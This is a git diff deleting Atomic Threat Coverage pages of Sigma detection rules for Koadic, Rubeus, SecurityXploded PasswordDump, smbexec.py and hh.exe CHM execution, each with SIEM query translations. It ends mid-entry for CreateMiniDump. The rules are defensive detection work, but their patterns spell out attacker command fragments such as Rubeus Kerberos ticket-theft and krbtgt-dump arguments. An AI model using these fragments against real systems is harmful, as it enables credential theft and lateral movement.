diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_hack_koadic.md b/Atomic_Threat_Coverage/Detection_Rules/win_hack_koadic.md
deleted file mode 100644
index eb1dcfc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_hack_koadic.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Koadic Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects command line parameters used by Koadic hack tool |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1170: Mshta](https://attack.mitre.org/techniques/T1170)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Pentest</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/](https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/)</li><li>[https://github.com/zerosum0x0/koadic/blob/master/data/stager/js/stdlib.js#L955](https://github.com/zerosum0x0/koadic/blob/master/data/stager/js/stdlib.js#L955)</li><li>[https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/](https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/)</li></ul>  |
-| **Author**               | wagga |
-| Other Tags           | <ul><li>attack.t1218.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Koadic Execution
-id: 5cddf373-ef00-4112-ad72-960ac29bac34
-status: experimental
-description: Detects command line parameters used by Koadic hack tool
-references:
-    - https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/
-    - https://github.com/zerosum0x0/koadic/blob/master/data/stager/js/stdlib.js#L955
-    - https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/
-tags:
-    - attack.execution
-    - attack.t1170
-    - attack.t1218.005
-date: 2020/01/12
-author: wagga
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine:
-            - '*cmd.exe* /q /c chcp *'
-    condition: selection1
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Pentest
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*cmd.exe.* /q /c chcp .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*cmd.exe*\ \/q\ \/c\ chcp\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/5cddf373-ef00-4112-ad72-960ac29bac34 <<EOF
-{
-  "metadata": {
-    "title": "Koadic Execution",
-    "description": "Detects command line parameters used by Koadic hack tool",
-    "tags": [
-      "attack.execution",
-      "attack.t1170",
-      "attack.t1218.005"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*cmd.exe*\\ \\/q\\ \\/c\\ chcp\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*cmd.exe*\\ \\/q\\ \\/c\\ chcp\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Koadic Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*cmd.exe* \/q \/c chcp *)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*cmd.exe* /q /c chcp *") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*cmd.exe* /q /c chcp *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*cmd\.exe.* /q /c chcp .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_hack_rubeus.md b/Atomic_Threat_Coverage/Detection_Rules/win_hack_rubeus.md
deleted file mode 100644
index af028ad..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_hack_rubeus.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Rubeus Hack Tool       |
-|:-------------------------|:------------------|
-| **Description**          | Detects command line parameters used by Rubeus hack tool |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li><li>[T1558: Steal or Forge Kerberos Tickets](https://attack.mitre.org/techniques/T1558)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/](https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0005</li><li>attack.t1558.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Rubeus Hack Tool
-id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
-description: Detects command line parameters used by Rubeus hack tool
-author: Florian Roth
-references:
-    - https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/
-date: 2018/12/19
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.s0005
-    - attack.t1558
-    - attack.t1558.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* asreproast *'
-            - '* dump /service:krbtgt *'
-            - '* kerberoast *'
-            - '* createnetonly /program:*'
-            - '* ptt /ticket:*'
-            - '* /impersonateuser:*'
-            - '* renew /ticket:*'
-            - '* asktgt /user:*'
-            - '* harvest /interval:*'
-    condition: selection
-falsepositives:
-    - unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* asreproast .*" -or $_.message -match "CommandLine.*.* dump /service:krbtgt .*" -or $_.message -match "CommandLine.*.* kerberoast .*" -or $_.message -match "CommandLine.*.* createnetonly /program:.*" -or $_.message -match "CommandLine.*.* ptt /ticket:.*" -or $_.message -match "CommandLine.*.* /impersonateuser:.*" -or $_.message -match "CommandLine.*.* renew /ticket:.*" -or $_.message -match "CommandLine.*.* asktgt /user:.*" -or $_.message -match "CommandLine.*.* harvest /interval:.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ asreproast\ * OR *\ dump\ \/service\:krbtgt\ * OR *\ kerberoast\ * OR *\ createnetonly\ \/program\:* OR *\ ptt\ \/ticket\:* OR *\ \/impersonateuser\:* OR *\ renew\ \/ticket\:* OR *\ asktgt\ \/user\:* OR *\ harvest\ \/interval\:*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7ec2c172-dceb-4c10-92c9-87c1881b7e18 <<EOF
-{
-  "metadata": {
-    "title": "Rubeus Hack Tool",
-    "description": "Detects command line parameters used by Rubeus hack tool",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.s0005",
-      "attack.t1558",
-      "attack.t1558.003"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ asreproast\\ * OR *\\ dump\\ \\/service\\:krbtgt\\ * OR *\\ kerberoast\\ * OR *\\ createnetonly\\ \\/program\\:* OR *\\ ptt\\ \\/ticket\\:* OR *\\ \\/impersonateuser\\:* OR *\\ renew\\ \\/ticket\\:* OR *\\ asktgt\\ \\/user\\:* OR *\\ harvest\\ \\/interval\\:*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ asreproast\\ * OR *\\ dump\\ \\/service\\:krbtgt\\ * OR *\\ kerberoast\\ * OR *\\ createnetonly\\ \\/program\\:* OR *\\ ptt\\ \\/ticket\\:* OR *\\ \\/impersonateuser\\:* OR *\\ renew\\ \\/ticket\\:* OR *\\ asktgt\\ \\/user\\:* OR *\\ harvest\\ \\/interval\\:*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Rubeus Hack Tool'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* asreproast * * dump \/service\:krbtgt * * kerberoast * * createnetonly \/program\:* * ptt \/ticket\:* * \/impersonateuser\:* * renew \/ticket\:* * asktgt \/user\:* * harvest \/interval\:*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* asreproast *" OR CommandLine="* dump /service:krbtgt *" OR CommandLine="* kerberoast *" OR CommandLine="* createnetonly /program:*" OR CommandLine="* ptt /ticket:*" OR CommandLine="* /impersonateuser:*" OR CommandLine="* renew /ticket:*" OR CommandLine="* asktgt /user:*" OR CommandLine="* harvest /interval:*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* asreproast *", "* dump /service:krbtgt *", "* kerberoast *", "* createnetonly /program:*", "* ptt /ticket:*", "* /impersonateuser:*", "* renew /ticket:*", "* asktgt /user:*", "* harvest /interval:*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* asreproast .*|.*.* dump /service:krbtgt .*|.*.* kerberoast .*|.*.* createnetonly /program:.*|.*.* ptt /ticket:.*|.*.* /impersonateuser:.*|.*.* renew /ticket:.*|.*.* asktgt /user:.*|.*.* harvest /interval:.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_hack_secutyxploded.md b/Atomic_Threat_Coverage/Detection_Rules/win_hack_secutyxploded.md
deleted file mode 100644
index d8b234d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_hack_secutyxploded.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | SecurityXploded Tool       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of SecurityXploded Tools |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://securityxploded.com/](https://securityxploded.com/)</li><li>[https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/](https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: SecurityXploded Tool
-id: 7679d464-4f74-45e2-9e01-ac66c5eb041a
-description: Detects the execution of SecurityXploded Tools
-author: Florian Roth
-references:
-    - https://securityxploded.com/
-    - https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
-date: 2018/12/19
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.s0005
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Company: SecurityXploded
-    selection2:
-        Image|endswith: 'PasswordDump.exe'
-    selection3:
-        OriginalFilename|endswith: 'PasswordDump.exe'
-    condition: 1 of them
-falsepositives:
-    - unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "Company.*SecurityXploded" -or $_.message -match "Image.*.*PasswordDump.exe" -or $_.message -match "OriginalFilename.*.*PasswordDump.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(Company:"SecurityXploded" OR winlog.event_data.Image.keyword:*PasswordDump.exe OR OriginalFilename.keyword:*PasswordDump.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7679d464-4f74-45e2-9e01-ac66c5eb041a <<EOF
-{
-  "metadata": {
-    "title": "SecurityXploded Tool",
-    "description": "Detects the execution of SecurityXploded Tools",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.s0005"
-    ],
-    "query": "(Company:\"SecurityXploded\" OR winlog.event_data.Image.keyword:*PasswordDump.exe OR OriginalFilename.keyword:*PasswordDump.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(Company:\"SecurityXploded\" OR winlog.event_data.Image.keyword:*PasswordDump.exe OR OriginalFilename.keyword:*PasswordDump.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SecurityXploded Tool'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Company:"SecurityXploded" OR Image.keyword:*PasswordDump.exe OR OriginalFilename.keyword:*PasswordDump.exe)
-```
-
-
-### splunk
-    
-```
-(Company="SecurityXploded" OR Image="*PasswordDump.exe" OR OriginalFilename="*PasswordDump.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Company="SecurityXploded" OR Image="*PasswordDump.exe" OR OriginalFilename="*PasswordDump.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*SecurityXploded|.*.*PasswordDump\.exe|.*.*PasswordDump\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_hack_smbexec.md b/Atomic_Threat_Coverage/Detection_Rules/win_hack_smbexec.md
deleted file mode 100644
index 6dc0fde..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_hack_smbexec.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | smbexec.py Service Installation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of smbexec.py tool by detecting a specific service installation |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1077: Windows Admin Shares](https://attack.mitre.org/techniques/T1077)</li><li>[T1035: Service Execution](https://attack.mitre.org/techniques/T1035)</li><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Penetration Test</li><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)</li></ul>  |
-| **Author**               | Omer Faruk Celik |
-| Other Tags           | <ul><li>attack.t1569.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: smbexec.py Service Installation
-id: 52a85084-6989-40c3-8f32-091e12e13f09
-description: Detects the use of smbexec.py tool by detecting a specific service installation
-author: Omer Faruk Celik
-date: 2018/03/20
-references:
-    - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
-tags:
-    - attack.lateral_movement
-    - attack.execution
-    - attack.t1077
-    - attack.t1035
-    - attack.t1021
-    - attack.t1569.002
-logsource:
-    product: windows
-    service: system
-detection:
-    service_installation:
-        EventID: 7045
-        ServiceName: 'BTOBTO'
-        ServiceFileName: '*\execute.bat'
-    condition: service_installation
-fields:
-    - ServiceName
-    - ServiceFileName
-falsepositives:
-    - Penetration Test
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045" -and $_.message -match "ServiceName.*BTOBTO" -and $_.message -match "ServiceFileName.*.*\\execute.bat") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND winlog.event_data.ServiceName:"BTOBTO" AND winlog.event_data.ServiceFileName.keyword:*\\execute.bat)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/52a85084-6989-40c3-8f32-091e12e13f09 <<EOF
-{
-  "metadata": {
-    "title": "smbexec.py Service Installation",
-    "description": "Detects the use of smbexec.py tool by detecting a specific service installation",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.execution",
-      "attack.t1077",
-      "attack.t1035",
-      "attack.t1021",
-      "attack.t1569.002"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:\"BTOBTO\" AND winlog.event_data.ServiceFileName.keyword:*\\\\execute.bat)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:\"BTOBTO\" AND winlog.event_data.ServiceFileName.keyword:*\\\\execute.bat)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'smbexec.py Service Installation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n    ServiceName = {{_source.ServiceName}}\nServiceFileName = {{_source.ServiceFileName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND ServiceName:"BTOBTO" AND ServiceFileName.keyword:*\\execute.bat)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045" ServiceName="BTOBTO" ServiceFileName="*\\execute.bat") | table ServiceName,ServiceFileName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045" service="BTOBTO" ServiceFileName="*\\execute.bat")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*BTOBTO)(?=.*.*\execute\.bat))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_hh_chm.md b/Atomic_Threat_Coverage/Detection_Rules/win_hh_chm.md
deleted file mode 100644
index e6550b0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_hh_chm.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | HH.exe Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies usage of hh.exe executing recently modified .chm files. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1223: Compiled HTML File](https://attack.mitre.org/techniques/T1223)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unlike</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1223/T1223.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1223/T1223.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html](https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Dan Beavin), oscd.community |
-| Other Tags           | <ul><li>attack.t1218.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: HH.exe Execution
-id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84
-description: Identifies usage of hh.exe executing recently modified .chm files.
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Dan Beavin), oscd.community
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1223/T1223.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html
-date: 2019/10/24
-modified: 2019/11/11
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1223
-    - attack.t1218.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\hh.exe'
-        CommandLine|contains: '.chm'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - unlike
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\hh.exe" -and $_.message -match "CommandLine.*.*.chm.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\hh.exe AND winlog.event_data.CommandLine.keyword:*.chm*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/68c8acb4-1b60-4890-8e82-3ddf7a6dba84 <<EOF
-{
-  "metadata": {
-    "title": "HH.exe Execution",
-    "description": "Identifies usage of hh.exe executing recently modified .chm files.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1223",
-      "attack.t1218.001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\hh.exe AND winlog.event_data.CommandLine.keyword:*.chm*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\hh.exe AND winlog.event_data.CommandLine.keyword:*.chm*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'HH.exe Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\hh.exe AND CommandLine.keyword:*.chm*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\hh.exe" CommandLine="*.chm*") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\hh.exe" CommandLine="*.chm*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\hh\.exe)(?=.*.*\.chm.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_hktl_createminidump.md b/Atomic_Threat_Coverage/Detection_Rules/win_hktl_createminidump.md
deleted file mode 100644
index df12236..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_hktl_createminidump.md
+++ /dev/null
@@ -1,268 +0,0 @@
-| Title                    | CreateMiniDump Hacktool       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
